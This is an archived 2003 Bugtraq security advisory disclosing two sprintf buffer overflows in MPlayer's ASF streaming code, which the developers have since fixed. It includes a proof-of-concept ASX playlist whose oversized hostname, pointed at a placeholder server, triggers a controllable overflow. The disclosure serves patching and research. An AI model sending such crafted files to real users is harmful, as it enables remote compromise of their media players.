lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 25 Sep 2003 19:17:49 -0500 From: "Otero, Hernan" <hernan.otero@....com> To: "'bugtraq@...urityfocus.com'" <bugtraq@...urityfocus.com> Subject: Mplayer Buffer Overflow Favorite Linux Player Buffer Overflow Product: Mplayer Developers: http://www.mplayerhq.hu OS: Port to All *NIX and Win32 Remote Exploitable: YES Developers has been contacted, problem was fixed, recomended update your mplayer version. In the source tree there is a file called asf_streaming.c this file has a function named asf_http_request, that function has two buffer overflows, this overflows are in the sprintf lines. asf_http_request { char str[250]; .... ... .. sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port ); .... ... .. sprintf( str, "Host: %s:%d", url->hostname, url->port ); .... ... .. } This, at a first look, may look as it can´t be exploited ( because the MAXHOSTLEN size restriction )... but if in an ASX file like this with a "badsite" listening in "badport" send "\n\n" as answer you could lead to a fully controllable EIP buffer overflow <asx version = "3.0"> <title>Bas Site ASX</title> <moreinfo href = "mailto:info@...site.com <mailto:info@...site.com> " /> <logo href = "http://www.badsite.com/streaming/grupo.gif <http://www.badsite.com/streaming/grupo.gif> " style="ICON" /> <banner href= "images/bannermitre.gif"> <abstract>Bad Site live</abstract> <moreinfo target="_blank" href = "http://www.badsite.com/ <http://www.badsite.com/> " /> </banner> <entry> <title>NEWS</title> <AUTHOR>NEWS</AUTHOR> <COPYRIGHT>© All by the news</COPYRIGHT> <ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa"/> <logo href = "http://www.badsite.com/streaming/grupo.gif <http://badsite.com/streaming/grupo.gif> " style="ICON" /> </entry> </asx> Regards, Hernán Otero hernan.otero@....com
Powered by blists - more mailing lists